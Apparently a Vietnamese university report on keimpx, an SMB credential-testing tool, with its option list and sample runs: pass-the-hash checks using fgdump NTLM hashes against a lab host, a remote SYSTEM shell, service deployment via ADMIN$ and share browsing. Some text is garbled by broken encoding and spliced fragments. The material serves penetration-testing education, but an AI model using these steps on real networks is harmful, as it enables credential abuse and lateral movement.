1. Trang chủ
  2. » Tất cả

An toàn mạng bài báo cáo keimpx

30 0 0

Đang tải... (xem toàn văn)

Tài liệu hạn chế xem trước, để xem đầy đủ mời bạn chọn Tải xuống

THÔNG TIN TÀI LIỆU

Nội dung

HỌC VIỆN CƠNG NGHỆ BƯU CHÍNH VIỄN THƠNG KHOA CƠNG NGHỆ THƠNG TIN Học phần: An tồn mạng Bài báo cáo: Keimpx Mục lục LỜI MỞ ĐẦU Chương Khái quát Keimpx 1.Tổng quan Keimpx .4 3.Cách sử dụng 4.Các ví dụ Chương Cài đặt 23 Chương Demo 24 Lời mở đầu Hiện thời đại công nghệ thơng tin việc tin học hóa coi yếu tố định, có vai trị quan trọng việc tạo bước đột phá mạnh mẽ đời sống người.Và điều quan trong giới cơng nghệ an tồn bảo mật keimpx sinh để phục vụ phần đóng góp cho an tồn Nó sử dụng để nhanh chóng kiểm tra thông tin xác thực hợp lệ mạng qua SMB,Nếu thông tin đăng nhập hợp lệ phát toàn mạng sau giai đoạn công, người dùng yêu cầu chọn máy chủ lưu trữ để kết nối thông tin đăng nhập hợp lệ để sử dụng Sau đó, chúng cung cấp SMB shell tương tác Chương 1.Khái quát KEIMPX 1.Tổng quan KEIMPX - keimpx công cụ mã nguồn mở, phát hành theo Giấy phép Apache 2.0 - Keimpx cơng cụ mã nguồn mở mạnh mẽ giúp nhà nghiên cứu nhanh chóng phát thơng tin xác thực hợp lệ liên quan đến SMB mơi trường mạng Các thơng tin đăng nhập thông tin sau: ● Sự kết hợp mật người dùng / văn túy ● Sự kết hợp băm người dùng / NTLM ● Kết hợp mã thông báo phiên đăng nhập người dùng / NTLM ● Kết hợp mã thông báo phiên đăng nhập người dùng / NTLM Nếu thông tin đăng nhập hợp lệ phát toàn mạng sau giai đoạn công, người dùng yêu cầu chọn máy chủ lưu trữ để kết nối thông tin đăng nhập hợp lệ để sử dụng Sau đó, chúng cung cấp SMB shell tương tác , nơi người dùng có thể: ● Tạo dấu nhắc lệnh tương tác ● Điều hướng thông qua chia sẻ SMB từ xa: danh sách, tải lên, tải xuống tệTriển khai hủy triển khai dịch vụ riêng họ, chẳng hạn, cửa sau lắng nghe cổng TCP cho kết nối đến ● p, tạo, xóa tệp, v.v ● Liệt kê chi tiết người dùng, tên miền sách mật - keimpx phát triển Python 3.8 sử dụng thư viện Impacket tuyệt vời từ SecureAuth Corporation cho nhiều chức keimpx sử dụng thư viện PyCryptodome cho hàm mật mã 3.Cách sử dụng : ● Giả sử bạn thực kiểm tra thâm nhập sở hạ tầng mạng lớn, bạn sở hữu máy trạm Windows, nâng cấp đặc quyền lên Administratorc LOCAL SYSTEMvà kết xuất hàm băm mật ● Bạn liệt kê danh sách máy miền Windows thông qua netlệnh, quét ping, quét ARP đánh giá lưu lượng mạng ● Bây giờ, bạn muốn kiểm tra tính hợp lệ hàm băm kết xuất mà khơng cần bẻ khóa chúng tồn mạng Windows qua SMB sao? Điều xảy bạn muốn đăng nhập vào nhiều hệ thống cách sử dụng hàm băm NTLM kết xuất sau lướt lượt chia sẻ chí tạo dấu nhắc lệnh? ● keimpx sau thực thi cách chạy hệ thống Linux:./keimpx.py [options] ● cách sử dụng: keimpx.py [options] Tùy chọn: - version hiển thị thông tin phiên chương trình -h, help hiển thị thông tin trợ giúp -v VERBOSE Mức chi tiết: 0-2 (mặc định: 0) -t TARGET địa mục tiêu -l LIST tệp danh sách địa mục tiêu -U người dùng USER -P PASSWORD password nt = NTHASH NT băm lm = LMHASH LM băm -c Tệp danh sách chứng CREDSFILE Miền -D DOMAIN -d tệp danh sách miền DOMAINSFILE -p PORT Cổng SMB: 139 445 (mặc định: 445) -n NAME tên máy chủ địa phương -T THREADS số lượng kết nối đồng thời tối đa (mặc định: 10) -b Chế độ hàng loạt -x EXECUTELIST Danh sách lệnh thực thi cho tất máy chủ 4.Các ví dụ: ● kiểm tra tính hữu dụng cặp tên người dùng / văn túy hệ thống $ python keimpx.py -t 172.16.77.130 -U Administrator -P validpassword -v -b This product includes software developed by CORE Security Technologies (http://www.coresecurity.com), Python Impacket library keimpx 0.2 by Bernardo Damele A G [16:49:35] [INFO] Loading targets [16:49:35] [INFO] Loading credentials [16:49:35] [INFO] Loading domains [16:49:35] [INFO] Loaded unique targets [16:49:35] [INFO] Loaded unique credentials [16:49:35] [INFO] No domains specified, using NULL domain [16:49:35] [INFO] Attacking host 172.16.77.130:445 [16:49:35] [INFO] Valid credentials on 172.16.77.130:445: Administrator/testpass [16:49:35] [INFO] Attack on host 172.16.77.130:445 finished The credentials worked in total times TARGET SORTED RESULTS: 172.16.77.130:445 Administrator/testpass ● Kiểm tra tính hữu dụng hàm băm kết xuất vào hệ thống tương tác với sau $ cat /tmp/hashes_and_plain # Lines output of fgdump Administrator:500:0123456789ABCDEF0123456789ABCDEF:FEDCBA98 76543210FEDCBA9876543210::: ASPNET:1003:F9E4566E60BF54D2C5CBAB2825145C99:6CD9B3F3132 973F0A7825B81E4191C68::: Guest:501:NO PASSWORD*********************:NO PASSWORD*********************::: # Cracked plain-text password testuser testpass $ python keimpx.py -t 172.16.77.130 -c /tmp/hashes_and_plain -v This product includes software developed by CORE Security Technologies (http://www.coresecurity.com), Python Impacket library keimpx 0.2 by Bernardo Damele A G [15:53:23] [INFO] Loading targets [15:53:23] [INFO] Loading credentials [15:53:23] [INFO] Loading domains [15:53:23] [INFO] Loaded unique targets [15:53:23] [INFO] Loaded unique credentials [15:53:23] [INFO] No domains specified, using NULL domain [15:53:23] [INFO] Attacking host 172.16.77.130:445 [15:53:23] [INFO] Valid credentials on 172.16.77.130:445: Administrator/0123456789ABCDEF0123456789ABCDEF:FEDCBA98765 43210FEDCBA9876543210 [15:53:23] [INFO] Valid credentials on 172.16.77.130:445: ASPNET/F9E4566E60BF54D2C5CBAB2825145C99:6CD9B3F3132973F0 A7825B81E4191C68 [15:53:23] [INFO] Wrong credentials on 172.16.77.130:445: Guest/BLANK (2239) [15:53:23] [INFO] Valid credentials on 172.16.77.130:445: testuser/testpass [15:53:23] [INFO] Attack on host 172.16.77.130:445 finished The credentials worked in total times TARGET SORTED RESULTS: 172.16.77.130:445 Administrator/0123456789ABCDEF0123456789ABCDEF:FEDCBA98765 43210FEDCBA9876543210 ASPNET/F9E4566E60BF54D2C5CBAB2825145C99:6CD9B3F3132973F0 A7825B81E4191C68 testuser/testpass USER SORTED RESULTS: Administrator/0123456789ABCDEF0123456789ABCDEF:FEDCBA98765 43210FEDCBA9876543210 172.16.77.130:445 ASPNET/F9E4566E60BF54D2C5CBAB2825145C99:6CD9B3F3132973F0 A7825B81E4191C68 172.16.77.130:445 testuser/testpass 172.16.77.130:445 10 (C) Copyright 1985-2003 Microsoft Corp C:\WINDOWS\system32>whoami whoami nt authority\system C:\WINDOWS\system32>ipconfig ipconfig Windows IP Configuration Ethernet adapter Local Area Connection 3: Connection-specific DNS Suffix : localdomain IP Address : 172.16.77.130 Subnet Mask : 255.255.255.0 Default Gateway : 172.16.77.2 C:\WINDOWS\system32>exit exit [16:53:20] [INFO] Connecting to the SVCCTL named pipe 16 [16:53:20] [INFO] Stopping the service 'uYRYKB' [16:53:20] [INFO] Deleting the service 'uYRYKB' [16:53:20] [INFO] Removing the service executable 'ADMIN$\ihtell.exe' # exit ● Sử dụng cặp thông tin xác thực hợp lệ để tương tác với sau $ python keimpx.py -t 172.16.77.130 -U Administrator -P validpassword This product includes software developed by CORE Security Technologies (http://www.coresecurity.com), Python Impacket library keimpx 0.2 by Bernardo Damele A G The credentials worked in total times TARGET SORTED RESULTS: 172.16.77.130:445 Administrator/validpassword 17 USER SORTED RESULTS: Administrator/validpassword 172.16.77.130:445 Do you want to get a shell from any of the targets? [Y/n] y Which target you want to connect to? [1] 172.16.77.130:445 > Which credentials you want to use to connect? [1] Administrator/validpassword > # help Generic options =============== help - show this message verbosity {level} - set verbosity level (0-2) info - list system information exit - terminates the SMB session and exit from the tool 18 Shares options ============== shares - list available shares use {sharename} - connect to an specific share cd {path} - changes the current directory to {path} pwd - shows current remote directory ls {path} - lists all the files in the current directory cat {file} - display content of the selected file download {filename} - downloads the filename from the current path upload {filename} - uploads the filename into the current path mkdir {dirname} - creates the directory under the current path rm {file} - removes the selected file rmdir {dirname} - removes the directory under the current path Services options ================ deploy {service name} {local file} [service args] - deploy remotely a service executable undeploy {service name} {remote file} - undeploy remotely a service executable Shell options 19 ============= shell [port] - spawn a shell listening on a TCP port, by default 2090/tcp Users options ============= users [domain] - list users, optionally for a specific domain pswpolicy [domain] - list password policy, optionally for a specific domain domains - list domains to which the system is part of Registry options (Soon) ================ regread {registry key} - read a registry key regwrite {registry key} {registry value} - add a value to a registry key regdelete {registry key} - delete a registry key # shares [1] print$ (type: 0, comment: Printer Drivers) [2] C$ (type: 0, comment: Default share) [3] CanonMP9 (type: 1, comment: Canon MP980 series Printer) [4] share (type: 0, comment: ) [5] C (type: 0, comment: ) [6] CanonMP9.2 (type: 1, comment: Canon MP980 series Printer (Copy 1)) 20 [7] IPC$ (type: 3, comment: Remote IPC) [8] ADMIN$ (type: 0, comment: Remote Admin) Which share you want to connect to? (default 1) # dir Wed Sep 19 10:11:41 2007 AUTOEXEC.BAT Sat Sep 12 15:38:04 2009 208 boot.ini [ ] # cat boot.ini [boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Windows Server 2003, Standard" /fastdetect /NoExecute=OptOut # cd Windows\Temp # dir Fri Nov 18:30:15 2009 Fri Nov 18:30:15 2009 Wed May 12:51:52 2009 Cookies Wed May 12:51:52 2009 History Wed May 12:51:52 2009 Temporary Internet Files 21 # !ls 1 Which credentials you want to use to connect? [1]

Ngày đăng: 26/02/2023, 14:14